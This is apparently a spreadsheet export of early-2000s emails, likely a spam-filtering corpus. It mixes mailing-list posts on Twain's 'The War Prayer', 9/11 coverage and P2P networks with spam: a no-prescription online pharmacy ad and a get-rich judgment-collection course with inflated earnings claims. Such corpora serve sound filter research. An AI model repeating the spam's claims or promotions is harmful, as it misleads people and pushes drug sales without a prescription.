 patriots armed with the love of God." He usurps the pulpit and prays the
 following:
 "O Lord our God, help us to tear their soldiers to bloody shreads with our
 shells; help us to cover their smiling fields with the pale forms of their
 patriot dead; help us to drown the thunder of the guns with the shrieks of
 their wounded, writhing in pain; help us to lay waste their humble homes with
 a hurricane of fire; help us to wring the hearts of their unoffending widows
 with unavailing grief; help us to turn them out roofless with their little
 children to wander unfriended the wastes of their desolated land in rags and
 hunger and thirst, sports of the sun flames in summer and the icy winds of
 winter, broken in spirit, worn with travail, imploring Thee for the refuge of
 the grave and denied it -- for our sakes who adore Thee, Lord, blast their
 hopes, blight their lives, protract their bitter pilgrimage, make heavy their
 steps, water their way with their tears, stain the white snow with the blood
 of their wounded feet! We ask it, in the spirit of love, of Him Who is the
 Source of Love, and Who is the ever-faithful refuge and friend of all that
 are sore beset and seek His aid with humble and contrite hearts. Amen."
 Twain wrote the story, "The War Prayer," in 1905 during the American
 occupation of the Philippines, but the story wasn't printed until 1923,
 thirteen years after his death, because the editors thought it "unsuitable"
 for publication at the time it was written.
 #  distributed via &lt;nettime&gt;: no commercial use without permission
 #  &lt;nettime&gt; is a moderated mailing list for net criticism,
 #  collaborative text filtering and cultural politics of the nets
 #  more info: majordomo@bbs.thing.net and "info nettime-l" in the msg body
 #  archive: http://www.nettime.org contact: nettime@bbs.thing.net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</si>
  <si>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Tribute MovieMail - Vol. 1 #48
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: From salon.com - Forbidden thoughts about 9/11
</t>
  </si>
  <si>
    <t xml:space="preserve">--0-1051763016-1031874793=:3397
 Content-Type: text/plain; charset=us-ascii
 I am delurking to comment on the Salon article. I just wanted to say that I am grateful they choose not to publish my forbidden thought. I sent it in a couple of days before the 9/11 commeration. If I had just watched the sentimental network and cable shows on 9/11 my cynical thoughts would have remain unchanged. However, I watch the Frontline show "Faith and Doubt at Ground Zero" on PBS. That show tackled head on, with much more courage than I have seen elsewhere, the larger questions about good and evil, about art as an alternate religion (Karlheinz Stockhausen -- 9/11 was a great work of art), and especially the question about how religion has a darker side which when carried to fanatic extremes tends to negate the humanity of the non-believers.
 I am not a religious person but I stunned at the scope of this program. It talked about the Lutheran minister who spoke at Yankees Stadium on a podium with other religious leaders present who was charged with heresy by his own church for promoting the idea that all religions are equal (presumably the Lutherans have the one true path?).
 Thanks for listening, I just felt like I needed to put the word out about this program. My shallow comment on Salon and others like it (my boyfriend and I had sex while the towers collapsed) gives me pause about how some of us tend to harden ourselves to the suffering of others.
 Mike
  Chris Haun wrote:i though this was all rather interesting, first bit of 9/11 coverage that 
 i've liked.
 http://www.salon.com/mwt/feature/2002/09/11/forbidden_letters/index.html
 Chris
 ---------------------------------
 Do you Yahoo!?
 Yahoo! News - Today's headlines
 --0-1051763016-1031874793=:3397
 Content-Type: text/html; charset=us-ascii
 &lt;P&gt;I am delurking to comment on the Salon article. I just wanted to say that I am grateful they choose not to publish my forbidden thought. I sent it in a couple of days before the 9/11 commeration. If I had just watched the sentimental network and cable shows on 9/11 my cynical thoughts would have remain unchanged. However, I watch the Frontline show "Faith and Doubt at Ground Zero" on PBS. That show tackled head on, with much more courage than I have seen elsewhere, the larger questions about good and evil, about art as an alternate religion (Karlheinz Stockhausen -- 9/11 was a great work of art), and especially the question about how religion has a darker side which when carried to fanatic extremes tends to negate the humanity of the non-believers.
 &lt;P&gt;I am not a religious person but I stunned at the scope of this program. It talked about the Lutheran minister who spoke at Yankees Stadium on a podium with other religious leaders present who was charged with heresy by his own church for promoting the idea that all religions are equal (presumably the Lutherans have the one true path?).
 &lt;P&gt;Thanks for listening, I just felt like I needed to put the word out about this program. My shallow comment on Salon and others like it (my boyfriend and I had sex while the towers collapsed) gives me pause about how&amp;nbsp;some&amp;nbsp;of us&amp;nbsp;tend to harden ourselves to the suffering of others.
 &lt;P&gt;Mike
 &lt;P&gt;&amp;nbsp;&lt;B&gt;&lt;I&gt;Chris Haun &lt;CHRIS@NOSKILLZ.COM&gt;&lt;/I&gt;&lt;/B&gt;wrote:
 &lt;BLOCKQUOTE style="PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #1010ff 2px solid"&gt;i though this was all rather interesting, first bit of 9/11 coverage that &lt;BR&gt;i've liked.&lt;BR&gt;&lt;BR&gt;http://www.salon.com/mwt/feature/2002/09/11/forbidden_letters/index.html&lt;BR&gt;&lt;BR&gt;Chris&lt;BR&gt;&lt;/BLOCKQUOTE&gt;&lt;p&gt;&lt;br&gt;&lt;hr size=1&gt;Do you Yahoo!?&lt;br&gt;
 &lt;b&gt;&lt;a href="http://news.yahoo.com/"&gt;Yahoo! News&lt;/a&gt;&lt;/b&gt; - Today's headlines
 --0-1051763016-1031874793=:3397--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Random hack Q: drawing on CDs with lasers?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 24 Sep 2002, Rohit Khare wrote:
 &gt; I suppose this is a modern equivalent to line-printer artwork; I was 
 &gt; imagining using a CD-RW drive to use the outer track, say, to spell out 
 &gt; the disc title, creation time, etc. It would sure beat feeding CDs 
 &gt; through a laser printer :-)
 There are commercial burners which can be labeled that way. Patterns in 
 the unburnt section.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Without a Perscription - VIAGRA / PHENTERMINE / PROPECIA / ZYBAN yotgy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#333333" link=3D"636DAD" vlink=3D"636DA=
 D" alink=3D"636DAD"&gt;
 &lt;table border=3D"0" width=3D"100%" cellspacing=3D"0" cellpadding=3D"6"&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;font face=3D"Arial Rounded MT Bold" size=3D"7" color=3D"#636DAD"&gt;&lt;a href=
 =3D"http://www.royalmeds.com/main2.php?rx=3D17686" style=3D"text-decorati=
 on: none"&gt;Royal Meds&lt;/a&gt;&lt;/font&gt;&lt;i&gt;&lt;a href=3D"http://www.royalmeds.com/mai=
 n2.php?rx=3D17686" style=3D"text-decoration: none"&gt;&lt;font face=3D"Arial Ro=
 unded MT Bold" color=3D"#636DAD"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;font face=3D"Arial Rounded MT Bold" color=3D"636DAD"&gt;your online =
 pharmacy &lt;/font&gt;&lt;font color=3D"636DAD" face=3D"Arial"&gt;=B7&lt;/font&gt;&lt;font fac=
 e=3D"Arial Rounded MT Bold" color=3D"636DAD"&gt; &lt;/font&gt;&lt;/a&gt;&lt;font face=3D"Ar=
 ial Rounded MT Bold"&gt;&lt;a href=3D"http://www.royalmeds.com/main2.php?rx=3D1=
 7686"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;Your online pharmacy for &lt;i&gt;&lt;b&gt;FDA approv=
 ed&lt;/b&gt;&lt;/i&gt; drugs through a online consultation.&lt;br&gt;
 No more embarrassing doctor visits, we offers confidential ordering onlin=
 e.&lt;br&gt;
 Take advantage of some of best prices available on the Internet! &lt;br&gt;
 We offer the widest range of drugs available through online ordering. &lt;b&gt;=
 &lt;i&gt;Such as:&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;table border=3D"0" cellpadding=3D"6" cellspacing=3D"0" style=3D"border-c=
 ollapse: collapse" bordercolor=3D"#111111"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;a href=3D"http://www.royalmeds.com/main2=
 .php?rx=3D17686"&gt;&lt;img src=3D"http://www.royalmeds.com/images/viag-head.jp=
 g" border=3D"0" width=3D"279" height=3D"50"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;i&gt;&lt;b&gt;&lt;font color=3D"#FF0000" face=3D"Arial"&gt;&lt;span class=3D"special-red"&gt;=
 Less than $7.00 per dose&lt;br&gt;
 &lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;Viagra&lt;/b&gt; Inten=
 ded for men with erectile dysfunction (ED), it helps most men to get and =
 keep an erection when they get sexually excited. No need to go through em=
 barrassing, stressful situation anymore, you can now get Viagra from the =
 comfort of your home. &lt;b&gt;&lt;a href=3D"http://www.royalmeds.com/main2.php?rx=
 =3D17686"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;table border=3D"0" cellpadding=3D"6" cellspacing=3D"0" style=3D"border-c=
 ollapse: collapse" bordercolor=3D"#111111"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;a href=3D"http://www.royalmeds.com/main2=
 .php?rx=3D17686"&gt;&lt;img src=3D"http://www.royalmeds.com/images/phen-head.jp=
 g" border=3D"0" width=3D"279" height=3D"50"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;Phentermine&lt;/b&gt; Obesity weight loss dr=
 ug. It enables people to burn more fat doing nothing, stimulating your ne=
 rvous system. You will feel the difference! It will give you more energy,=
  you will become more active! It's an appetite suppressant, you'll burn f=
 at easier and eat less. It is a both safe and effective treatment to lose=
  weight. &lt;b&gt;&lt;a href=3D"http://www.royalmeds.com/main2.php?rx=3D17686"&gt;Cli=
 ck Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;table border=3D"0" cellpadding=3D"6" cellspacing=3D"0" style=3D"border-c=
 ollapse: collapse" bordercolor=3D"#111111"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;a href=3D"http://www.royalmeds.com/main2=
 .php?rx=3D17686"&gt;&lt;img src=3D"http://www.royalmeds.com/images/zyban-head.j=
 pg" border=3D"0" width=3D"279" height=3D"50"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;Zyban&lt;/b&gt; is the first nicotine-free p=
 ill that, as part of a comprehensive program from your health care profes=
 sional, can help you stop smoking. Its prescription medicine available on=
 ly from your health care professional for smokers 18 and older. &lt;b&gt;&lt;a hre=
 f=3D"http://www.royalmeds.com/main2.php?rx=3D17686"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width=3D"100%"&gt;
 &lt;table border=3D"0" cellpadding=3D"6" cellspacing=3D"0" style=3D"border-c=
 ollapse: collapse" bordercolor=3D"#111111"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;a href=3D"http://www.royalmeds.com/main2=
 .php?rx=3D17686"&gt;&lt;img src=3D"http://www.royalmeds.com/images/prop-head.jp=
 g" border=3D"0" width=3D"279" height=3D"50"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=3D"Arial" size=3D"2"&gt;&lt;b&gt;PROPECIA&lt;/b&gt; is a medical breakthrough=
 . The first pill that effectively treats male pattern hair loss on the ve=
 rtex (at top of head) and anterior mid-scalp area. &lt;b&gt;&lt;a href=3D"http://w=
 ww.royalmeds.com/main2.php?rx=3D17686"&gt;Click Here&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;div align=3D"center"&gt;
 &lt;center&gt;&lt;table style=3D"border-collapse: collapse" borderColor=3D"#111111=
 " cellSpacing=3D"0" cellPadding=3D"0" width=3D"90%" border=3D"0"&gt;
 &lt;tr&gt;
 &lt;td align=3D"middle" colSpan=3D"2"&gt;
 &lt;hr noshade color=3D"#808080" size=3D"1"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 &lt;p align=3D"left"&gt;&lt;span class=3D"special-red"&gt;&lt;a href=3D"http://www.royal=
 meds.com/main2.php?rx=3D17686"&gt;&lt;img src=3D"http://www.royalmeds.com/image=
 s/fedexlogo.gif" width=3D"258" height=3D"28"&gt;&lt;/a&gt;&lt;/span&gt;&lt;p align=3D"left"=
 &gt;&amp;nbsp;&lt;p align=3D"left"&gt;&amp;nbsp;&lt;p align=3D"left"&gt;&amp;nbsp;&lt;p align=3D"left"&gt;=
 &amp;nbsp;&lt;p align=3D"left"&gt;&amp;nbsp;&lt;p align=3D"left"&gt;&amp;nbsp;&lt;p align=3D"left"&gt;&amp;=
 nbsp;&lt;p align=3D"left"&gt;&lt;font size=3D"2" face=3D"Arial"&gt;&lt;b&gt;Unsubscribe Inf=
 ormation:&lt;/b&gt;&lt;br&gt;
 This email is intended to be a benefit to the recipient. If you would lik=
 e to opt-out and not receive any more marketing information please click =
 on the following link &lt;font face=3D"Verdana" size=3D"2"&gt;&lt;a href=3D"http:/=
 /194.44.46.21/remove.php"&gt;http://194.44.46.21/remove.php&lt;/a&gt;&lt;/font&gt; . You=
 r address will be removed within 24hrs. We sincerely apologize for any in=
 convenience.&lt;/font&gt;&lt;/body&gt;&lt;/html&gt;
 vfyxeuedwacdjxriumtvrkybkfketsuq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</si>
  <si>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On Wednesday 04 September 2002 10:59 pm, CDale wrote:
 &gt; Someone needs to tell the mayor about this:
 &gt; http://www.cb-2000.com/
 "Chastity" technologies were doomed from the start, and I'll add chemical 
 ones to the trash heap.  (Yeah, Cindy, these are decorative toys for the 
 subculture, but....)  
 Generally,someone is attempting to preserve a relationship with this 
 nonsense, when quite plainly the the relationship is in a state where 
 preserving it is of little value.  Hardware is of no real use save for 
 playing the power-struggle game.   I don't want to see the future of this.
 "Invisible Fence" for your mate.   "Must wear" location transponders and 
 endocrine monitors.   More movies like "Minority Report."
 It seems so automatic for people to reach for coercive solutions.   So 
 surprizing given the low absolute effectiveness of coercion in the absense 
 of overwhelming force advantage.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Microsoft buys XDegress - more of a p2p/distributed data thing...
</t>
  </si>
  <si>
    <t xml:space="preserve">Mr. FoRK writes:
 &gt; "Files can be cached on multiple systems randomly scattered around the
 &gt; Internet, as with Napster or Freenet. In fact, the caching in XDegrees is
 &gt; more sophisticated than it is on those systems: users with high bandwidth
 &gt; connections can download portions, or "stripes," of a file from several
 &gt; cached locations simultaneously. The XDegrees software then reassembles
 &gt; these stripes into the whole file and uses digital signatures to verify that
 &gt; the downloaded file is the same as the original. A key component of this
 &gt; digital signature is a digest of the file, which is stored as an HTTP header
 &gt; for the file."
 This "more sophisticated than [Napster or Freenet]" part seems
 to be the same behavior implemented in many other P2P CDNs, 
 such as:
   - Kazaa
   - EDonkey/Overnet
   - BitTorrent
   - Gnutella (with HUGE extensions)
   - OnionNetworks WebRAID
 ...though the quality of the "digest" used by each system varies
 wildly.
 - Gordon
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: never a cent
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000625
 Date: 2002-10-01T22:54:21-06:00
 MusicDish: First Blood is Spilled[1]. "Back Street Boy Kevin Richardson [] 
 testified that they have NEVER received a royalty check" So much for "we're 
 just trying to protect the artists", eh? 
 Wow. The Backstreet Boys! I mean, Janis Ian was easy to dismiss but this is a 
 whole 'nother ballgame. Wow.
 [1] http://www.musicdish.com/mag/?id=6675
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Judicial Judgements-Child Support                  BGS
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR:=
  #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt;&lt;marquee&gt;&lt;B&gt;&lt;center&gt;&lt;font color=3Dwhite size=3D2 face=3Darioso&gt;&lt;i&gt;xXxX=
 xXxXxXxXxXxXxXxXxXxXxX&lt;/i&gt;&lt;/center&gt;&lt;/B&gt;&lt;/font&gt;&lt;/marquee&gt;&lt;br&gt;&lt;BR&gt;&lt;b&gt;Thank&lt;/=
 b&gt; you for your interest!&lt;BR&gt;
 &lt;BR&gt;
 Judgment Courses offers an extensive training&lt;BR&gt;
 course in &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGR=
 OUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;&lt;B&gt;"How to Collect MoneyJudgments"&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  COLO=
 R=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;BR&gt;
 If you are like many people, you are not even sure what a&lt;BR&gt;
 Money Judgment is and &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" sty=
 le=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF"=
  FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;why processing Money Judgments&lt;BR&gt;
 can earn you very substantial income&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D=
 "#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D=
 "SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BAC=
 K=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAM=
 ILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;.&lt;BR&gt;
 &lt;BR&gt;
 If you ever sue a company or a person and you win then you&lt;BR&gt;
 will have a Money Judgment against them.&lt;BR&gt;
 &lt;BR&gt;
 You are happy you won but you will soon find out the&lt;BR&gt;
 shocking fact: &amp;quot;Its now up to you to collect on the&lt;BR&gt;
 Judgment&amp;quot;. The court does not require the loser to pay you.&lt;BR&gt;
 The court will not even help you. You must trace the loser&lt;BR&gt;
 down, find their assets, their employment, bank accounts,&lt;BR&gt;
 real estate, stocks and bonds, etc.&lt;BR&gt;
 &lt;BR&gt;
 Very few people know how to find these assets or what to do&lt;BR&gt;
 when they are found. The result is that millions of&lt;BR&gt;
 Judgments are just sitting in files and being forgotten.&lt;BR&gt;
 &lt;BR&gt;
 &amp;quot;In 79% of the cases the winner of a Judgment never sees a&lt;BR&gt;
 dime.&amp;quot;&lt;BR&gt;
 &lt;BR&gt;
 The non-payment of judicial debt has grown to epidemic&lt;BR&gt;
 proportions. Right now in the United States there is&lt;BR&gt;
 between &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROU=
 ND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial=
 " LANG=3D"0"&gt;200 and 300 billion dollars of uncollectedMoney&lt;BR&gt;
 Judgment debt&lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffffff" style=3D"BAC=
 KGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"=
 Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D=
 "BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=
 =3D"Arial" LANG=3D"0"&gt;. For every Judgment that is paid, 5more&lt;BR&gt;
 Judgments take its place.&lt;BR&gt;
 &lt;BR&gt;
 We identified this massive market 8 years ago and have&lt;BR&gt;
 actively pursued Judicial Judgments since. We invented this&lt;BR&gt;
 business. We have perfected it into a well proven and solid&lt;BR&gt;
 profession in which only a select few will be trained in the&lt;BR&gt;
 techniques necessary to succeed.&lt;BR&gt;
 &lt;BR&gt;
 With our first hand experience we have built a course which&lt;BR&gt;
 teaches you how to start your business in this new unknown&lt;BR&gt;
 and exciting field of processing Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 By following the steps laid out in our course and with&lt;BR&gt;
 reasonable effort you can become very successful in the&lt;BR&gt;
 processing of Money Judgments.&lt;BR&gt;
 &lt;BR&gt;
 The income potential is substantial in this profession.&lt;/FONT&gt;&lt;FONT  COLOR=
 =3D"#ff0000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3=
  PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT =
  COLOR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: #ffff00" SI=
 ZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;B&gt;We&lt;BR=
 &gt;
 have associates who have taken our course and are now&lt;BR&gt;
 working full time making $96,000.00 to over $200,000.00 per&lt;BR&gt;
 year. Part time associates are earning between $24,000.00&lt;BR&gt;
 and $100,000.00 per year&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffff00" s=
 tyle=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERI=
 F" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#fff=
 fff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SA=
 NSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;.&lt;/B&gt; Some choose to operateout of&lt;BR&gt;
 their home and work by themselves. Others build a sizable&lt;BR&gt;
 organization of 15 to 25 people in attractive business&lt;BR&gt;
 offices.&lt;BR&gt;
 &lt;BR&gt;
 Today our company and our associates have over 126&lt;BR&gt;
 million dollars in Money Judgments that we are currently&lt;BR&gt;
 processing. Of this 126 million, 25 million is in the form&lt;BR&gt;
 of joint ventures between our firm and our associates.&lt;BR&gt;
 Joint ventures are where we make our money. We only break&lt;BR&gt;
 even when our course is purchased. We make a 12% margin on&lt;BR&gt;
 the reports we supply to our associates. Our reporting&lt;BR&gt;
 capability is so extensive that government agencies, police&lt;BR&gt;
 officers, attorneys, credit agencies etc., all come to us&lt;BR&gt;
 for reports.&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 Many of our associates already have real estate liens in&lt;BR&gt;
 force of between 5 million to over 15 million dollars.&lt;BR&gt;
 Legally this means that when the properties are sold or&lt;BR&gt;
 refinanced our associate must be paid off. The norm is 10%&lt;BR&gt;
 interest compounded annually on unpaid Money Judgments.&lt;BR&gt;
 Annual interest on 5 million at 10% translates to&lt;BR&gt;
 $500,000.00 annually in interest income, not counting the&lt;BR&gt;
 payment of the principal.&lt;BR&gt;
 &lt;BR&gt;
 Our associates earn half of this amount or $250,000.00 per&lt;BR&gt;
 year. This is just for interest, not counting principle&lt;BR&gt;
 and not counting the compounding of the interest which can&lt;BR&gt;
 add substantial additional income. Typically companies are&lt;BR&gt;
 sold for 10 times earnings. Just based on simple interest&lt;BR&gt;
 an associate with 5 million in real estate liens could sell&lt;BR&gt;
 their business for approximately 2.5 million dollars.&lt;BR&gt;
 &lt;BR&gt;
 92% of all of our associates work out of their home; 43%&lt;BR&gt;
 are women and 36% are part time .&lt;BR&gt;
 &lt;BR&gt;
 One of the benefits of working in this field is that you are&lt;BR&gt;
 not under any kind of time frame. If you decide to take off&lt;BR&gt;
 for a month on vacation then go. The Judgments you are&lt;BR&gt;
 working on will be there when you return. The Judgments&lt;BR&gt;
 are still in force, they do not disappear.&lt;BR&gt;
 &lt;BR&gt;
 The way we train you is non-confrontational. You use your&lt;BR&gt;
 computer and telephone to do most of the processing. You&lt;BR&gt;
 never confront the debtor. The debtor doesn't know who you&lt;BR&gt;
 are. You are not a collection agency.&lt;BR&gt;
 &lt;BR&gt;
 Simply stated the steps to successful Money Processing&lt;BR&gt;
 are as follows:&lt;BR&gt;
 &lt;BR&gt;
 Mail our recommended letter to companies and individuals&lt;BR&gt;
 with Money Judgments. (We train you how to find out who&lt;BR&gt;
 to write to)&lt;BR&gt;
 &lt;BR&gt;
 8% to 11% of the firms and people you write will call you&lt;BR&gt;
 and ask for your help. They call you, you don't call them&lt;BR&gt;
 unless you want to.&lt;BR&gt;
 &lt;BR&gt;
 You send them an agreement (supplied in the course) to&lt;BR&gt;
 sign which splits every dollar you collect 50% to you and&lt;BR&gt;
 50% to them. This applies no matter if the judgment is for&lt;BR&gt;
 $2,000.00 or $2,000,000.00.&lt;BR&gt;
 &lt;BR&gt;
 You then go on-line to our computers to find the debtor&lt;BR&gt;
 and their assets. We offer over 120 powerful reports to&lt;BR&gt;
 assist you. They range from credit reports from all three&lt;BR&gt;
 credit bureaus, to bank account locates, employment&lt;BR&gt;
 locates, skip traces and locating stocks and bonds, etc.&lt;BR&gt;
 The prices of our reports are very low. Typically 1/2 to&lt;BR&gt;
 1/3 of what other firms charge. For example we charge&lt;BR&gt;
 $6.00 for an individuals credit report when some other&lt;BR&gt;
 companies charge $25.00.&lt;BR&gt;
 &lt;BR&gt;
 Once you find the debtor and their assets you file&lt;BR&gt;
 garnishments and liens on the assets you have located.&lt;BR&gt;
 (Standard fill in the blanks forms are included in the&lt;BR&gt;
 course)&lt;BR&gt;
 &lt;BR&gt;
 When you receive the assets you keep 50% and send 50% to&lt;BR&gt;
 the original Judgment holder.&lt;BR&gt;
 &lt;BR&gt;
 Once the Judgment is fully paid you mail a Satisfaction of&lt;BR&gt;
 Judgment to the court. (Included in the course)&lt;BR&gt;
 &lt;BR&gt;
 Quote's from several of our students:&lt;BR&gt;
 &lt;BR&gt;
 Thomas in area code 516 writes us: "I just wanted to drop&lt;BR&gt;
 you a short note thanking you for your excellent course. &lt;/FONT&gt;&lt;FONT  COL=
 OR=3D"#ff0000" BACK=3D"#ffff00" style=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;My&lt;BR&gt;
 first week, part time, will net me 3,700.00 dollars&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT  CO=
 LOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; .Your&lt;BR&gt;
 professionalism in both the manual and your support.  &lt;BR&gt;
 You have the video opened doors for me in the future. &lt;BR&gt;
 There's no stopping me now. Recently Thomas states &lt;BR&gt;
 he has over $8,500,000 worth of judgments he is working on"&lt;BR&gt;
 &lt;BR&gt;
 After only having this course for four months, Larry S. in&lt;BR&gt;
 area code 314 stated to us: &lt;/FONT&gt;&lt;FONT  COLOR=3D"#ff0000" BACK=3D"#ffff0=
 0" style=3D"BACKGROUND-COLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANS=
 SERIF" FACE=3D"Arial" LANG=3D"0"&gt;"I am now making $2,000.00 per&lt;BR&gt;
 week&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffff00" style=3D"BACKGROUND-C=
 OLOR: #ffff00" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGR=
 OUND-COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Ari=
 al" LANG=3D"0"&gt;and expect this to grow to twice this amountwithin the&lt;BR&gt;
 next year. I am having a ball. I have over $250,000 in&lt;BR&gt;
 judgments I am collecting on now"&lt;BR&gt;
 &lt;BR&gt;
 After having our course for 7 months Larry S. in 314 stated&lt;BR&gt;
 "I am now making $12,000.00 per month and have approximately&lt;BR&gt;
 $500,000.00 in judgments I am collecting on. Looks like I&lt;BR&gt;
